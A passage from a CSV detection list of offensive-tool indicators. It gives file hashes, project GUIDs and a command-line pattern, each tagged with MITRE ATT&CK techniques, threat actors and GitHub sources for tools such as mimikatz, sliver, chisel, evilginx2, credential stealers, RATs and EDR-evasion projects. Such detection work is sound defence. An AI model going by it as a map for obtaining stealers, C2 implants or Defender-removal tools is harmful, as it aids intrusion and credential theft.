Access","https://github.com/GhostPack/KeeThief","1","0","#filehash","N/A","10","10","944","154","2020-11-18T18:35:21Z","2016-07-10T19:11:23Z","40287" "*dbf5c14d8ea7fe326f57fbe2b2e140367d7cd6003cbab42bf4bf11de50b52359*",".{0,1000}dbf5c14d8ea7fe326f57fbe2b2e140367d7cd6003cbab42bf4bf11de50b52359.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","40289" "*dbf75975cedefebfbc67ebc49ea438821e8835a8ea6b4b922e473861cf72edf7*",".{0,1000}dbf75975cedefebfbc67ebc49ea438821e8835a8ea6b4b922e473861cf72edf7.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","40290" "*dbf7d95c705622042a557724ccaeca139cdf0f95603ba67ea1db10ba4ec414ff*",".{0,1000}dbf7d95c705622042a557724ccaeca139cdf0f95603ba67ea1db10ba4ec414ff.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","40292" "*dbGetNimplant*",".{0,1000}dbGetNimplant.{0,1000}","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","Black 
Basta","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","N/A","10","10","871","111","2025-03-28T18:53:57Z","2023-02-13T13:42:39Z","40293" "*dc07fa75e50a2b71b6e6163c0052fbeef8aa20896af6346a6646692d09bcc06b*",".{0,1000}dc07fa75e50a2b71b6e6163c0052fbeef8aa20896af6346a6646692d09bcc06b.{0,1000}","offensive_tool_keyword","rotateproxy","A tool that uses fofa to search for socks5 open proxies and perform proxy pool rotation","T1071.001 - T1090 - T1095 - T1189","TA0011 - TA0010 - TA0005","N/A","N/A","Defense Evasion","https://github.com/akkuman/rotateproxy","1","0","#filehash","N/A","10","9","800","135","2024-01-24T05:47:37Z","2021-10-18T02:10:27Z","40294" "*dc12cf2c161aea6ad015a11593b74603e25a4c7754b96b3d3b4062bd0e5d5a09*",".{0,1000}dc12cf2c161aea6ad015a11593b74603e25a4c7754b96b3d3b4062bd0e5d5a09.{0,1000}","offensive_tool_keyword","BrowserSnatch","steals important data from all chromium and gecko browsers installed in the system and gather the data in a stealer db to be exfiltrated out. 
A powerful Browser Stealer","T1081 - T1074 - T1114 - T1005 - T1041 - T1027","TA0006 - TA0009 - TA0010","N/A","N/A","Data Exfiltration","https://github.com/shaddy43/BrowserSnatch","1","0","#filehash","N/A","10","3","246","39","2025-03-31T21:04:30Z","2024-08-26T18:38:42Z","40297" "*DC199D9E-CF10-41DD-BBCD-98E71BA8679D*",".{0,1000}DC199D9E\-CF10\-41DD\-BBCD\-98E71BA8679D.{0,1000}","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - T1003","TA0011","N/A","N/A","Malware","https://github.com/qwqdanchun/DcRat","1","0","#GUIDproject","N/A","10","10","968","332","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z","40298" "*DC199D9E-CF10-41DD-BBCD-98E71BA8679D*",".{0,1000}DC199D9E\-CF10\-41DD\-BBCD\-98E71BA8679D.{0,1000}","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - T1003","TA0011","N/A","N/A","Malware","https://github.com/qwqdanchun/DcRat","1","0","#GUIDproject","N/A","10","10","968","332","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z","40299" "*dc1baea53709f425ba181705c3f6c37d4840e3e88d71a5e3b39ee40948f12e87*",".{0,1000}dc1baea53709f425ba181705c3f6c37d4840e3e88d71a5e3b39ee40948f12e87.{0,1000}","offensive_tool_keyword","reverse-ssh","Statically-linked ssh server with reverse shell functionality for CTFs and such","T1105 - T1572 - T1569.002 - T1090","TA0001 - TA0002 - TA0003 - TA0010 - TA0011 - TA0005 ","N/A","N/A","C2","https://github.com/Fahrj/reverse-ssh","1","0","#filehash","N/A","10","10","961","141","2023-02-15T00:16:25Z","2021-07-12T18:26:29Z","40300" "*dc1bce76ba20f6d3a7020b35f18d47a74597018b0e58a9b1aff6d77be72f4a44*",".{0,1000}dc1bce76ba20f6d3a7020b35f18d47a74597018b0e58a9b1aff6d77be72f4a44.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","40301" "*dc20294fe264fea6841e0aed2560f0b995070f9bc680d170932ef50e05ef0690*",".{0,1000}dc20294fe264fea6841e0aed2560f0b995070f9bc680d170932ef50e05ef0690.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","40303" "*dc229f8b0113731ba7d73a24c9951a9511067c151fdff7f4bb3b3ec8a55fb287*",".{0,1000}dc229f8b0113731ba7d73a24c9951a9511067c151fdff7f4bb3b3ec8a55fb287.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","40305" "*dc23ff9df3352509e1d8c461f0ac98fe52c1d5ab5c264c047da4afc2cd6df87c*",".{0,1000}dc23ff9df3352509e1d8c461f0ac98fe52c1d5ab5c264c047da4afc2cd6df87c.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege 
Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","40306" "*dc25fef1e036e80dbbf1a5665fa13dc1ed6f8c56875161608cdf532d8a21a4a5*",".{0,1000}dc25fef1e036e80dbbf1a5665fa13dc1ed6f8c56875161608cdf532d8a21a4a5.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0001","N/A","BlackCat - COLDRIVER - Black Basta","Phishing","https://github.com/An0nUD4Y/evilginx2","1","0","#filehash","N/A","10","","N/A","","","","40307" "*dc2b0f4a1f3c1c8a209fec149e05aec9f9a387ec7224e593552c19ec03dd630f*",".{0,1000}dc2b0f4a1f3c1c8a209fec149e05aec9f9a387ec7224e593552c19ec03dd630f.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","#filehash","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","40308" "*dc2d30a37a77a23ba928d9191bb54740f760396b46bb862b841bf22b857e9884*",".{0,1000}dc2d30a37a77a23ba928d9191bb54740f760396b46bb862b841bf22b857e9884.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","40309" "*dc2dd05cc2f6dea85f0bfc16b0e1008687a32fd92f49f0043ca60a061fd59c66*",".{0,1000}dc2dd05cc2f6dea85f0bfc16b0e1008687a32fd92f49f0043ca60a061fd59c66.{0,1000}","offensive_tool_keyword","traitor","Automatically exploit low-hanging fruit to pop a 
root shell. Linux privilege escalation made easy","T1068 - T1548.004 - T1611 - T1203 - T1059.004","TA0004 - TA0001 - TA0002 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/liamg/traitor","1","0","#linux #filehash","N/A","10","10","6853","651","2024-03-12T21:01:14Z","2021-01-24T10:50:15Z","40310" "*dc3c1af9-ea3d-4401-9158-eb6dda735276*",".{0,1000}dc3c1af9\-ea3d\-4401\-9158\-eb6dda735276.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Mostly abused by attackers ","T1021 - T1090 - T1573 - T1219 - T1562.001","TA0001 - TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#GUIDproject","N/A","9","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","40314" "*dc3d98a8e8c0b0944291f9b462f552f174261982c4507f2de1ee9503353d10e9*",".{0,1000}dc3d98a8e8c0b0944291f9b462f552f174261982c4507f2de1ee9503353d10e9.{0,1000}","offensive_tool_keyword","WDExtract","Extract Windows Defender database from vdm files and unpack it","T1059 - T1005 - T1119","TA0002 - TA0009 - TA0003","N/A","N/A","Defense Evasion","https://github.com/hfiref0x/WDExtract/","1","0","#filehash","N/A","8","5","440","61","2020-02-10T06:53:43Z","2019-04-19T17:33:48Z","40315" "*DC3E0E14-6342-41C9-BECC-3653BF533CCC*",".{0,1000}DC3E0E14\-6342\-41C9\-BECC\-3653BF533CCC.{0,1000}","offensive_tool_keyword","PredatorTheStealer","C++ stealer (passwords - cookies - forms - cards - wallets) ","T1078 - T1114 - T1555 - T1539 - T1212 - T1132","TA0006 - TA0010","N/A","N/A","Credential Access","https://github.com/SecUser1/PredatorTheStealer","1","0","#GUIDproject","N/A","8","1","11","2","2022-12-06T16:46:33Z","2022-12-06T16:34:43Z","40316" "*dc48cbd7466cffbd9ec80dd26109b9e633b9bb02e73d8db992e2e5c83ff81bdb*",".{0,1000}dc48cbd7466cffbd9ec80dd26109b9e633b9bb02e73d8db992e2e5c83ff81bdb.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network 
mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043 - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash #linux","N/A","5","","N/A","","","","40318" "*dc56b9ac51cdacc0157d4180275cefb938e8476356a46b1faed2fddfb5d1907d*",".{0,1000}dc56b9ac51cdacc0157d4180275cefb938e8476356a46b1faed2fddfb5d1907d.{0,1000}","offensive_tool_keyword","rotateproxy","A tool that uses fofa to search for socks5 open proxies and perform proxy pool rotation","T1071.001 - T1090 - T1095 - T1189","TA0011 - TA0010 - TA0005","N/A","N/A","Defense Evasion","https://github.com/akkuman/rotateproxy","1","0","#filehash","N/A","10","9","800","135","2024-01-24T05:47:37Z","2021-10-18T02:10:27Z","40319" "*dc5a1f72ecaa1cddb1df73ddd075819eb5d2d35f95ea11639cfa1e189ed15217*","","offensive_tool_keyword","atexec-pro","Fileless atexec for lateral movement","T1021.002 - T1105","TA0008 - TA0011","N/A","N/A","Lateral Movement","https://github.com/Ridter/atexec-pro","1","0","#filehash","N/A","10","4","366","45","2024-03-28T03:36:50Z","2024-03-27T09:15:00Z","40321" "*dc5d95d4ce6cee631b546e1bbfa9f090f66e4167edd5dd828f567c7fc30978dc*",".{0,1000}dc5d95d4ce6cee631b546e1bbfa9f090f66e4167edd5dd828f567c7fc30978dc.{0,1000}","offensive_tool_keyword","fscan","Vulnerability scanner","T1595","TA0042 - TA0007","N/A","Earth Lusca","Reconnaissance","https://github.com/shadow1ng/fscan","1","0","#filehash","N/A","8","10","11931","1725","2025-04-20T11:30:29Z","2020-11-13T16:35:20Z","40322" "*DC6187CB-D5DF-4973-84A2-F92AAE90CDA9*",".{0,1000}DC6187CB\-D5DF\-4973\-84A2\-F92AAE90CDA9.{0,1000}","offensive_tool_keyword","HellsGate","The Hell's Gate technique is a method employed by malware to hide its malicious behavior and avoid detection. 
This technique involves executing system calls directly thus bypassing the Windows API (Application Programming Interface) which is typically monitored by EDRs","T1055 - T1548.002 - T1129","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/am0nsec/HellsGate","1","0","#GUIDproject","N/A","N/A","10","1028","121","2021-06-28T15:42:36Z","2020-06-02T17:10:21Z","40323" "*DC6187CB-D5DF-4973-84A2-F92AAE90CDA9*",".{0,1000}DC6187CB\-D5DF\-4973\-84A2\-F92AAE90CDA9.{0,1000}","offensive_tool_keyword","TartarusGate","TartarusGate Bypassing EDRs","T1055 - T1218.011 - T1027.009 - T1027 - T1105 - T1102.001","TA0005 - TA0001 - TA0002 - TA0009","N/A","N/A","Defense Evasion","https://github.com/trickster0/TartarusGate","1","0","#GUIDproject","N/A","10","6","579","72","2022-01-25T20:54:28Z","2021-11-27T19:46:30Z","40324" "*dc6471615591b2fca412d411535f597485b37854f602dadac37da3aee4fb0e45*",".{0,1000}dc6471615591b2fca412d411535f597485b37854f602dadac37da3aee4fb0e45.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","40325" "*dc713dd00f6dd0dbf2edb9ec5db8749e996a665356e8c6d595b6558b8864b06a*",".{0,1000}dc713dd00f6dd0dbf2edb9ec5db8749e996a665356e8c6d595b6558b8864b06a.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","40326" "*dc7b3b918bee32e7dac453ec8f60269d7c3502ce48e312f233651ce930ee68e0*",".{0,1000}dc7b3b918bee32e7dac453ec8f60269d7c3502ce48e312f233651ce930ee68e0.{0,1000}","offensive_tool_keyword","Malware RAT 
collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","40328" "*dc86081b57b7809bfd3df4c8ed664ca0a786a239bdb522ea129f66571f4fd992*",".{0,1000}dc86081b57b7809bfd3df4c8ed664ca0a786a239bdb522ea129f66571f4fd992.{0,1000}","offensive_tool_keyword","brutespray","BruteSpray takes nmap GNMAP/XML output or newline separated JSONS and automatically brute-forces services with default credentials using Medusa. BruteSpray can even find non-standard ports by using the -sV inside Nmap.","T1110","TA0001 - TA0043","N/A","N/A","Credential Access","https://github.com/x90skysn3k/brutespray","1","0","#filehash","N/A","10","10","2231","405","2025-04-21T03:17:20Z","2017-04-05T17:05:10Z","40329" "*dc89b02f14f9f44483c863df6965528f3f7f1efbdcbe31db757c6a295e706b33*",".{0,1000}dc89b02f14f9f44483c863df6965528f3f7f1efbdcbe31db757c6a295e706b33.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","40330" "*dc8b8a51cb8c46c8a57a596d9c970eed5288b0378418c10cb98b5db399513b5a*",".{0,1000}dc8b8a51cb8c46c8a57a596d9c970eed5288b0378418c10cb98b5db399513b5a.{0,1000}","offensive_tool_keyword","windows-defender-remover","hacktool used to remove Windows Defender","T1089 - T1562.001 - T1562.004","TA0005 - TA0040","N/A","Black Basta","Defense Evasion","https://github.com/ionuttbara/windows-defender-remover","1","0","#filehash","N/A","10","10","5266","354","2025-02-13T20:21:07Z","2021-08-13T20:44:46Z","40331" 
"*dc8e495f3d1ee0060009f69bcdc8b60265879d41d20dd0367a638a101d3a19c6*",".{0,1000}dc8e495f3d1ee0060009f69bcdc8b60265879d41d20dd0367a638a101d3a19c6.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","40333" "*dc8e495f3d1ee0060009f69bcdc8b60265879d41d20dd0367a638a101d3a19c6*",".{0,1000}dc8e495f3d1ee0060009f69bcdc8b60265879d41d20dd0367a638a101d3a19c6.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - 
Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","40334" "*dc8ee760f0a1fb1a2f2a239cae71f44382a9be2b67736d590a471eae8c81d0af*",".{0,1000}dc8ee760f0a1fb1a2f2a239cae71f44382a9be2b67736d590a471eae8c81d0af.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","40335" "*dc95d92765b7ff96b8311920bfc939a9f234e961efc7c8fa4effe5d39ec13ea1*",".{0,1000}dc95d92765b7ff96b8311920bfc939a9f234e961efc7c8fa4effe5d39ec13ea1.{0,1000}","offensive_tool_keyword","HackBrowserData","Decrypt passwords/cookies/history/bookmarks from the browser","T1555.003 - T1552.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential 
Access","https://github.com/moonD4rk/HackBrowserData","1","0","#filehash","N/A","N/A","10","12216","1656","2025-04-06T01:32:13Z","2020-06-18T03:24:31Z","40337" "*dc9978d7-6299-4c5a-a22d-a039cdc716ea*",".{0,1000}dc9978d7\-6299\-4c5a\-a22d\-a039cdc716ea.{0,1000}","offensive_tool_keyword","smbscan","SMBScan is a tool to enumerate file shares on an internal network.","T1135 - T1046 - T1021","TA0007 - TA0043 - TA0008","N/A","APT22","Discovery","https://github.com/jeffhacks/smbscan","1","0","#GUIDproject","N/A","8","1","44","6","2025-03-24T01:55:30Z","2021-10-26T02:28:34Z","40338" "*dc9eb5bb3d882cb0ee30fd21ecbbb030e4e0367dff16b06109bfcfc40fef112*",".{0,1000}dc9eb5bb3d882cb0ee30fd21ecbbb030e4e0367dff16b06109bfcfc40fef112.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tool","https://github.com/Orange-Cyberdefense/arsenal","1","0","#filehash","commands cheat sheets","8","10","3399","511","2024-11-29T14:48:20Z","2020-09-02T13:24:50Z","40339" "*dca882cdfe33d94f69bd196da5ee79f6120ac057e366cadada88ec42e8f1ce06*",".{0,1000}dca882cdfe33d94f69bd196da5ee79f6120ac057e366cadada88ec42e8f1ce06.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043 - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash #linux","N/A","5","","N/A","","","","40340" "*dcbb2973c0775f8c81ec4f4d421de38d62196d169cfcad09ecd41c1ffb74bada*",".{0,1000}dcbb2973c0775f8c81ec4f4d421de38d62196d169cfcad09ecd41c1ffb74bada.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - 
TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","0","#filehash","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","40343" "*dcbc3efda3331913ba98b1d4feefcb122b5f7e3717b4c57bcdbf10eefa273aae*",".{0,1000}dcbc3efda3331913ba98b1d4feefcb122b5f7e3717b4c57bcdbf10eefa273aae.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","40344" "*dcbc47feceabeaecb5941fd36b3ca000a18ebb5431cb0d415c44e1235140dc2c*",".{0,1000}dcbc47feceabeaecb5941fd36b3ca000a18ebb5431cb0d415c44e1235140dc2c.{0,1000}","offensive_tool_keyword","SharpSploit","SharpSploit is a .NET post-exploitation library written in C# that aims to highlight the attack surface of .NET and make the use of offensive .NET easier for red teamers.","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tool","https://github.com/cobbr/SharpSploit","1","0","#filehash","N/A","10","10","1789","312","2021-08-12T18:23:15Z","2018-09-20T14:22:37Z","40345" "*dcbe3cad78afb24101b169bebec5b6d607a567c661fc3e39a659d260789699b4*",".{0,1000}dcbe3cad78afb24101b169bebec5b6d607a567c661fc3e39a659d260789699b4.{0,1000}","offensive_tool_keyword","KrbRelay-SMBServer","acts as an SMB server (instead of DCOM) to relay Kerberos AP-REQ to CIFS or HTTP","T1557 - T1021 - T1205 - T1071","TA0006 - TA0008 - TA0010","N/A","Black Basta","Lateral Movement","https://github.com/decoder-it/KrbRelay-SMBServer","1","0","#filehash","N/A","9","3","215","26","2024-10-08T14:55:59Z","2024-10-05T12:28:55Z","40346" 
"*dccbd0950837123fe57b99b394613e19cd4f4a35c26f4bc31b8c952272f213d4*",".{0,1000}dccbd0950837123fe57b99b394613e19cd4f4a35c26f4bc31b8c952272f213d4.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","40347" "*DCCDA4991BEBC5F2399C47C798981E7828ECC2BA77ED52A1D37BD866AD5582AA*",".{0,1000}DCCDA4991BEBC5F2399C47C798981E7828ECC2BA77ED52A1D37BD866AD5582AA.{0,1000}","offensive_tool_keyword","StandIn","StandIn is a small .NET35/45 AD post-exploitation toolkit","T1087 - T1069 - T1558 - T1204 - T1136 - T1482","TA0007 - TA0003 - TA0006 - TA0004","N/A","N/A","Discovery","https://github.com/FuzzySecurity/StandIn","1","0","#filehash","N/A","9","8","761","129","2023-12-02T21:20:09Z","2020-11-05T22:49:27Z","40348" "*dccon.exe -encrypt2*",".{0,1000}dccon\.exe\s\-encrypt2.{0,1000}","offensive_tool_keyword","DiskCryptor","DiskCryptor is an open source encryption solution that offers encryption of all disk partitions including system partitions","T1486 ","TA0040","N/A","N/A","Ransomware","https://github.com/DavidXanatos/DiskCryptor","1","0","N/A","N/A","10","5","499","108","2024-07-03T10:05:01Z","2019-04-20T14:51:18Z","40350" "*dcd82c989816c886bbe27741b2bece34a7bf4a1a9a34abfb9b34fe3cf9484201*",".{0,1000}dcd82c989816c886bbe27741b2bece34a7bf4a1a9a34abfb9b34fe3cf9484201.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black 
Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","40352" "*dcd89774d490ecfe91a08d0dcfc37065965f31aab2593987839f5afa19625a36*",".{0,1000}dcd89774d490ecfe91a08d0dcfc37065965f31aab2593987839f5afa19625a36.{0,1000}","offensive_tool_keyword","reverse-ssh","Statically-linked ssh server with reverse shell functionality for CTFs and such","T1105 - T1572 - T1569.002 - T1090","TA0001 - TA0002 - TA0003 - TA0010 - TA0011 - TA0005 ","N/A","N/A","C2","https://github.com/Fahrj/reverse-ssh","1","0","#filehash","N/A","10","10","961","141","2023-02-15T00:16:25Z","2021-07-12T18:26:29Z","40353" "*dcd8b443ee740b4ccd6674dd1e6b6cfccd9a202c282a67e06ce2f4aaa8a66d95*",".{0,1000}dcd8b443ee740b4ccd6674dd1e6b6cfccd9a202c282a67e06ce2f4aaa8a66d95.{0,1000}","offensive_tool_keyword","revbshell","ReVBShell - 